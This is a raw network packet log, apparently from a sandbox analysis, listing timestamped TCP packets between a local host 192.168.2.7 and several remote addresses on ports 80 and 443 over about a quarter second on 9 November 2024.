Nov 9, 2024 02:47:34.881891012 CET	53040	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.881908894 CET	53035	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.881939888 CET	53035	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.885608912 CET	443	53034	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.885667086 CET	443	53034	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.885765076 CET	53034	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.890818119 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.890830994 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.890836954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.890841961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.890908957 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.891385078 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891391993 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891410112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891422987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891429901 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891434908 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891442060 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891443014 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.891448021 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891455889 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891462088 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891468048 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891470909 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.891474962 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891482115 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891486883 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891500950 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.891505957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891513109 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891524076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891525984 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.891530037 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891535997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891552925 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.891571999 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.891572952 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891582012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891592979 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891598940 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891599894 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.891608000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.891633987 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.891673088 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.892505884 CET	53040	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.892505884 CET	53040	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.892514944 CET	443	53040	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.892523050 CET	443	53040	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.893842936 CET	53034	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.893842936 CET	53034	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.893860102 CET	443	53034	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.893868923 CET	443	53034	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.894556999 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894601107 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894613981 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894633055 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.894732952 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894740105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894746065 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894752026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894763947 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.894774914 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894781113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894785881 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.894785881 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894793034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894799948 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894809008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894809008 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.894815922 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894823074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894829035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894829035 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.894838095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894850016 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894855976 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.894877911 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.894891024 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.894932032 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894938946 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894948959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894963980 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894970894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894982100 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.894983053 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.894989967 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895019054 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.895032883 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.895070076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895076990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895091057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895102024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895107985 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895123959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895129919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895129919 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.895136118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895144939 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.895152092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895179987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895180941 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.895189047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895195007 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895200014 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.895200014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895207882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895234108 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.895241976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895247936 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895262957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895263910 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.895268917 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895292997 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.895298004 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895318031 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895325899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895332098 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.895332098 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.895339012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895347118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895353079 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895359039 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895363092 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.895365000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895374060 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895380020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895390034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895395041 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.895397902 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895405054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895412922 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895414114 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.895420074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895433903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.895452023 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.895482063 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.896151066 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896167994 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896172047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896199942 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.896219015 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.896312952 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896318913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896336079 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896342993 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896349907 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896356106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896362066 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896362066 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.896368027 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896404028 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.896404028 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.896430969 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896436930 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896449089 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896455050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896460056 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896491051 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.896492958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896498919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896505117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896506071 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.896512032 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896531105 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.896559000 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.896672010 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896714926 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.896745920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896752119 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896764994 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896770954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896785021 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896807909 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.896836996 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.896879911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896887064 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896893024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896899939 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896905899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896912098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896928072 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.896930933 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896939039 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896941900 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.896945000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896950006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.896975040 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.897001028 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.897022963 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897034883 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897042990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897048950 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897070885 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897074938 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897078037 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.897080898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897088051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897109032 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.897131920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897139072 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897141933 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.897145033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897151947 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897177935 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.897192001 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.897249937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897255898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897293091 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.897301912 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897308111 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897320032 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897326946 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897351027 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.897381067 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.897540092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897581100 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897588015 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897630930 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.897646904 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897654057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897665977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897684097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897699118 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.897818089 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897825003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.897865057 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.898781061 CET	53035	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.898789883 CET	443	53035	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.899380922 CET	53049	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.899390936 CET	443	53049	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.899458885 CET	53049	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.900542021 CET	53049	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.900552988 CET	443	53049	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.920974016 CET	443	53042	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.922749043 CET	443	53043	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.925379992 CET	53050	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.925411940 CET	443	53050	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.925478935 CET	53050	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.926392078 CET	53051	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.926409960 CET	443	53051	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.926491022 CET	53051	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.928957939 CET	53051	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.928971052 CET	443	53051	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.929358959 CET	53042	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.929373026 CET	443	53042	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.929909945 CET	53042	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.929913998 CET	443	53042	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.930793047 CET	53043	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.930807114 CET	443	53043	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.931394100 CET	53043	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.931399107 CET	443	53043	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.932383060 CET	53050	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.932394028 CET	443	53050	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.937623978 CET	53036	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.937664032 CET	53037	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.944457054 CET	443	53033	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.945075989 CET	443	53033	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.945148945 CET	53033	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.945267916 CET	53033	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.945267916 CET	53033	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.945275068 CET	443	53033	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.945281982 CET	443	53033	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.952899933 CET	53052	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.952919960 CET	443	53052	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.952979088 CET	53052	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.953165054 CET	53052	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.953178883 CET	443	53052	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.966439962 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.971467018 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.006943941 CET	443	53041	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:35.008033991 CET	443	53041	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:35.008183002 CET	53041	443	192.168.2.7	3.167.152.61
Nov 9, 2024 02:47:35.010066032 CET	53041	443	192.168.2.7	3.167.152.61
Nov 9, 2024 02:47:35.010072947 CET	443	53041	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:35.050107956 CET	443	53037	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.050129890 CET	443	53037	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.050184011 CET	53037	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.050198078 CET	443	53037	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.050420046 CET	443	53037	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.050482988 CET	53037	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.060079098 CET	53037	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.060096979 CET	443	53037	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.060204983 CET	443	53042	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.060269117 CET	443	53042	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.060585976 CET	53042	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.060691118 CET	53055	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.060703993 CET	443	53055	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.060833931 CET	53055	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.061265945 CET	53055	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.061276913 CET	443	53055	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.062581062 CET	53042	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.062586069 CET	443	53042	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.062882900 CET	53042	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.062886953 CET	443	53042	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.064307928 CET	443	53043	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.064362049 CET	443	53043	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.064547062 CET	53043	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.065179110 CET	53043	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.065201044 CET	443	53043	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.065253019 CET	53043	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.065258980 CET	443	53043	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.067265034 CET	443	53038	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.067295074 CET	443	53038	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.067348957 CET	443	53038	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.067394972 CET	53038	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.070122957 CET	53056	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.070146084 CET	443	53056	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.070265055 CET	53056	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.073560953 CET	443	53039	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.073581934 CET	443	53039	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.073642015 CET	53039	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.073651075 CET	443	53039	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.074985027 CET	443	53039	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.075112104 CET	53039	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.082931995 CET	443	53036	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.082945108 CET	443	53036	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.083013058 CET	443	53036	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.083014011 CET	53036	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.083058119 CET	53036	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.083568096 CET	53038	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.083575964 CET	443	53038	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.084919930 CET	53056	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.084933043 CET	443	53056	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.084989071 CET	53039	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.084999084 CET	443	53039	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.089320898 CET	53036	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.089324951 CET	443	53036	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.100886106 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:35.100895882 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:35.100975037 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:35.114716053 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:35.114727974 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:35.123516083 CET	443	53048	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.132174969 CET	53048	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.132184982 CET	443	53048	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.133336067 CET	443	53048	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.133433104 CET	53048	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.134417057 CET	53048	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.134504080 CET	443	53048	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.141616106 CET	53048	443	192.168.2.7	13.107.246.57
